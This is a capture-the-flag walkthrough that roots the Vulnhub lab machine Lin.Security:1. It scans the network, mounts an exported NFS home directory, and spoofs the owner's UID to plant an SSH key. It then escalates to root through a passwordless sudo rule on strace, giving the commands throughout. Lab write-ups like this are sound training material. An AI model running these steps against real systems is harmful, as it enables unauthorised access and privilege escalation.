Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.
Lets start by finding the IP.
root@kali:~# nmap -sS 192.168.18.0/24
Got the IP and open ports.
NFS is running on port 2019. Lets enumerate it.
root@kali:~# nmap -sV --script=nfs-* 192.168.18.102
We can mount /home/peter
to our machine.
root@kali:/mnt# mkdir lin
root@kali:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
root@kali:/mnt# ls -la
In order to login to the machine, we can place our ssh public key in .ssh
directory
(refer this article to learn how to create an ssh key)
Copy our public key (id_rsa.pub) to /tmp directory.
root@kali:/mnt# cd /root/.ssh
root@kali:~/.ssh# ls -la
total 20
drw------- 2 root root 4096 Jul 2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw------- 1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r-- 1 root root 563 Aug 12 08:35 id_rsa.pub
-rw-r--r-- 1 root root 3322 Aug 13 06:47 known_hosts
root@kali:~/.ssh# cp id_rsa.pub /tmp
make a directory named .ssh
in the directory we just mounted.
root@kali:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied
We dont have the permission to create the directory.
Lets create a user with uid 1001 to do this.
root@kali:~# useradd -u 1001 peter
Now change the ownwership of /tmp/id_rsa.pub
to peter
root@kali:~/.ssh# cd /tmp
root@kali:/tmp# chown peter:peter id_rsa.pub
root@kali:/tmp#
Lets copy the file to the mounted directory now. First lets change the user to peter
and copy the file.
root@kali:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys
We have copied our public key file to /tmp/.ssh/authorized_keys
Now, Let’s try to login as peter through ssh.
root@kali:~# cd .ssh
root@kali:~/.ssh# ssh [email protected]
We are now logged in as peter. Lets see what all we can do here as a privileged user.
peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
We can run /usr/bin/strace
as root.
Can we escalate our privileges with this?
Lets try.
peter@linsecurity:~$ sudo strace -o /dev/null /bin/sh
# whoami
root
We got the root!
This was a comparitively easier machine. Lets root another machine next day!